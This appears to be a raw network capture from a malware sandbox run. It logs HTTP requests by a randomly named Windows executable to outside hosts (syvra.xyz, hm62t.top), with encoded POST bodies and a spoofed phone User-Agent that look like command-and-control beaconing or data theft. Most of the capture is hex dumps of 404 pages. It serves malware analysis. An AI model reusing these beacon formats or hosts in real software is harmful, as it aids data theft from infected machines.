                      Referer: http://www.syvra.xyz/h2bb/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 6e 4c 69 33 68 6b 36 4c 73 57 47 71 72 31 70 77 36 31 51 4d 6f 54 56 4e 2f 6f 74 76 6f 49 69 73 70 4f 78 43 7a 4b 31 5a 61 30 68 71 50 34 61 63 42 75 36 59 35 68 31 64 79 30 49 2b 4a 2f 55 66 68 30 76 32 79 68 66 50 4a 57 67 78 69 35 56 75 4e 6a 6d 78 30 46 43 39 45 38 43 77 77 61 75 4d 55 33 6c 39 69 4d 6a 42 6b 71 6f 32 59 52 31 68 58 67 39 63 52 46 77 51 70 7a 31 70 72 54 70 50 53 37 33 59 58 70 6c 41 57 6f 6e 68 6d 6d 30 4c 45 6b 76 74 4b 77 41 4e 6c 4b 69 6d 67 65 6c 45 66 2f 31 38 6b 33 55 33 48 4c 67 72 64 6a 41 74 66 64 2b 47 74 55 4e 68 38 42 47 61 4e 62 32 74 49 6a 47 64 42 54 6e 65 68 66 54 71 78 52 45 39 58 45 74 71 43 62 49 75 34 49 70 36 71 68 35 35 6f 41 6d 44 50 79 2f 44 44 78 53 57 36 44 46 72 6c 52 38 79 53 34 32 62 42 39 70 55 33 66 61 57 74 44 2b 49 51 64 75 42 61 4f 6d 6f 77 43 6f 57 71 41 6c 44 68 74 51 5a 54 58 41 4f 76 56 52 61 45 49 41 58 50 31 36 44 49 48 38 47 68 74 4c 4b 44 71 37 61 39 6c 63 56 63 37 4b 6e 35 36 49 4e 78 58 68 61 73 33 4e 61 55 [TRUNCATED]
                      Data Ascii: MtXH8dRH=nLi3hk6LsWGqr1pw61QMoTVN/otvoIispOxCzK1Za0hqP4acBu6Y5h1dy0I+J/Ufh0v2yhfPJWgxi5VuNjmx0FC9E8CwwauMU3l9iMjBkqo2YR1hXg9cRFwQpz1prTpPS73YXplAWonhmm0LEkvtKwANlKimgelEf/18k3U3HLgrdjAtfd+GtUNh8BGaNb2tIjGdBTnehfTqxRE9XEtqCbIu4Ip6qh55oAmDPy/DDxSW6DFrlR8yS42bB9pU3faWtD+IQduBaOmowCoWqAlDhtQZTXAOvVRaEIAXP16DIH8GhtLKDq7a9lcVc7Kn56INxXhas3NaUW1eZOLyM7AESox421PPWFIRxxF5PV4i50/00YPfqtwNfAt0N15I4pC+uD6PaJcikMCId8ZcQdxB6ZweQzph/KH7/n4UL0UYCVjuSsGOZCpC33UDFka4iH5dLltAYshMAhBezFyhRgiyP8VQkRs8lEhV7jdHo/EuigrQUthCJBm7WyzZWPV+U2xmHXuNv/za66GFPnxU3NMO7BmoA/PFE+nBgV13GfInbIAsGPkS12ewehVJOqtlpLkvT5lrUSDvhDzydLujPHe2kGXvQT/DfvrfDW8CrUOht1iPhxUq4aNx48u26HIpDqr1ABUSOPwwl7iXHNm4R6/vpFOKOr3Woyb9Uvm7qoETcM9R1D/Go86Uhz/c3X3eheE0He3G8IGWRj9kvl4JeczzaRTbGJ45IVCTkz/Ft2KkJqbvuaV2b1dCIUP4+yfIzPSrEu04lkVKf0RpuuQBEMsAwnA/uYeK1y+gAYsar2gi//BbO/WTbKVwGCiY44TX819sTraPz4Z7yvKcLhhUrAYtGtj1lc9dH6roNgwPYB0IADXQHFuLfU86Hr+nNV9DwgfAgaw2SXmMlb592YtYWhq2EbFZe/mtRGzx8pqmmPIBm2uJGFsDs42WOelaTbosYimZSsYLBTeKhU3QlLCRK8jDiV3/XClpeTWdsw6SeXtudVh [TRUNCATED]
                      Sep 13, 2024 12:27:55.565969944 CEST1236INHTTP/1.1 404 Not Found
                      Date: Fri, 13 Sep 2024 10:27:55 GMT
                      Server: Apache
                      Content-Length: 16052
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                      Sep 13, 2024 12:27:55.566030025 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                      Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                      Sep 13, 2024 12:27:55.566066980 CEST1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                      Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                      Sep 13, 2024 12:27:55.566101074 CEST1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                      Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                      Sep 13, 2024 12:27:55.566137075 CEST896INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                      Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                      Sep 13, 2024 12:27:55.566170931 CEST1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                      Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                      Sep 13, 2024 12:27:55.566204071 CEST1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                      Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                      Sep 13, 2024 12:27:55.566237926 CEST448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                      Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                      Sep 13, 2024 12:27:55.566291094 CEST1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                      Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                      Sep 13, 2024 12:27:55.566329002 CEST1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                      Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                      Sep 13, 2024 12:27:55.572108030 CEST1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                      Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      8192.168.2.450409162.0.213.94803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:27:57.415049076 CEST479OUTGET /h2bb/?MtXH8dRH=qJKXiU3Y6HiR5EQ+73Yb2xdirYIwqZi0pOwD+eljRGtAAZDjMN2OxhxU5kptMPcWm3rk9DqOdiozjqcfWB2Wk1O1f7az6dmfaFVy77DKkP1oB1oCVi4cG1g=&EB04T=0hSTF8phw HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.syvra.xyz
                      Connection: close
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Sep 13, 2024 12:27:58.009443045 CEST1236INHTTP/1.1 404 Not Found
                      Date: Fri, 13 Sep 2024 10:27:57 GMT
                      Server: Apache
                      Content-Length: 16052
                      Connection: close
                      Content-Type: text/html; charset=utf-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                      Sep 13, 2024 12:27:58.009497881 CEST1236INData Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                      Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                      Sep 13, 2024 12:27:58.009533882 CEST1236INData Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
                      Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
                      Sep 13, 2024 12:27:58.009566069 CEST1236INData Raw: 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c
                      Data Ascii: width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /
                      Sep 13, 2024 12:27:58.009613991 CEST1236INData Raw: 38 2e 36 36 36 33 31 20 31 2e 32 34 39 39 32 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32
                      Data Ascii: 8.66631 1.249922,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000
                      Sep 13, 2024 12:27:58.009651899 CEST1236INData Raw: 31 2c 38 2e 30 32 34 30 36 20 30 2e 32 39 36 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73
                      Data Ascii: 1,8.02406 0.29651,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533"
                      Sep 13, 2024 12:27:58.009691000 CEST1236INData Raw: 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20
                      Data Ascii: -width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43
                      Sep 13, 2024 12:27:58.009721041 CEST108INData Raw: 34 36 37 32 20 2d 31 31 2e 39 31 32 38 30 38 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30
                      Data Ascii: 4672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,
                      Sep 13, 2024 12:27:58.009752035 CEST1236INData Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a
                      Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                      Sep 13, 2024 12:27:58.009804964 CEST224INData Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66
                      Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4
                      Sep 13, 2024 12:27:58.014846087 CEST1236INData Raw: 2e 36 37 31 35 37 31 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 72 78 3d 22 32 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 79 3d 22 32 33 38 2e 30 38 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 31 39 2e 31
                      Data Ascii: .6715717" rx="2.5" cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.0015747


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      9192.168.2.450410154.23.184.240803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:28:03.566529989 CEST733OUTPOST /edpl/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.hm62t.top
                      Origin: http://www.hm62t.top
                      Content-Length: 205
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.hm62t.top/edpl/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 6e 39 5a 37 70 2b 45 42 4f 45 6c 4a 62 39 2b 37 47 62 75 4f 50 70 7a 64 47 31 6f 49 6f 7a 74 42 41 61 78 47 6d 55 34 4f 69 75 32 6c 59 4b 5a 46 70 4f 33 57 62 35 66 73 46 6c 37 54 76 2f 36 38 39 64 35 33 6f 44 78 2f 51 65 7a 35 71 41 31 70 7a 35 44 67 4f 6c 65 7a 55 45 58 5a 4a 2f 76 65 37 6a 33 35 48 64 64 45 33 31 4c 55 36 2b 71 57 5a 34 4e 73 50 37 41 5a 35 36 57 34 77 38 41 6c 4b 36 67 43 44 4a 50 73 53 2b 59 73 6b 51 72 42 4d 2b 4b 4d 47 54 43 33 6e 71 66 63 62 4f 79 58 6e 52 50 64 31 52 76 6a 59 73 36 41 45 76 64 33 2b 34 54 54 71 41 52 75 55 65 54 38 78 6b 4e 74 4e 77 3d 3d
                      Data Ascii: MtXH8dRH=n9Z7p+EBOElJb9+7GbuOPpzdG1oIoztBAaxGmU4Oiu2lYKZFpO3Wb5fsFl7Tv/689d53oDx/Qez5qA1pz5DgOlezUEXZJ/ve7j35HddE31LU6+qWZ4NsP7AZ56W4w8AlK6gCDJPsS+YskQrBM+KMGTC3nqfcbOyXnRPd1RvjYs6AEvd3+4TTqARuUeT8xkNtNw==
                      Sep 13, 2024 12:28:04.472018957 CEST312INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 13 Sep 2024 10:28:04 GMT
                      Content-Type: text/html
                      Content-Length: 148
                      Connection: close
                      ETag: "66a8e223-94"
                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      10192.168.2.450411154.23.184.240803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:28:06.104347944 CEST753OUTPOST /edpl/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.hm62t.top
                      Origin: http://www.hm62t.top
                      Content-Length: 225
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.hm62t.top/edpl/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 6e 39 5a 37 70 2b 45 42 4f 45 6c 4a 61 63 4f 37 45 34 32 4f 4a 4a 7a 63 49 56 6f 49 2b 44 74 46 41 61 39 47 6d 57 55 65 68 63 53 6c 5a 72 70 46 6f 4d 50 57 63 35 66 73 4f 46 37 57 77 76 36 69 39 63 46 2f 6f 47 52 2f 51 65 6e 35 71 42 46 70 79 4b 37 2f 63 6c 65 78 63 6b 58 62 57 76 76 65 37 6a 33 35 48 64 49 72 33 31 6a 55 36 50 61 57 49 71 6c 76 46 62 41 61 36 36 57 34 30 38 41 35 4b 36 67 77 44 4d 71 4a 53 39 67 73 6b 52 62 42 4d 76 4b 50 66 44 43 78 6f 4b 65 66 66 4e 6a 53 72 45 33 64 38 43 4c 36 66 2b 2b 6b 49 4a 4d 74 76 4a 79 45 34 41 31 64 4a 5a 61 49 38 6e 77 6b 57 78 61 76 76 35 5a 56 4e 70 41 4b 72 52 53 67 6b 41 63 6d 55 31 49 3d
                      Data Ascii: MtXH8dRH=n9Z7p+EBOElJacO7E42OJJzcIVoI+DtFAa9GmWUehcSlZrpFoMPWc5fsOF7Wwv6i9cF/oGR/Qen5qBFpyK7/clexckXbWvve7j35HdIr31jU6PaWIqlvFbAa66W408A5K6gwDMqJS9gskRbBMvKPfDCxoKeffNjSrE3d8CL6f++kIJMtvJyE4A1dJZaI8nwkWxavv5ZVNpAKrRSgkAcmU1I=
                      Sep 13, 2024 12:28:07.015767097 CEST312INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 13 Sep 2024 10:28:06 GMT
                      Content-Type: text/html
                      Content-Length: 148
                      Connection: close
                      ETag: "66a8e223-94"
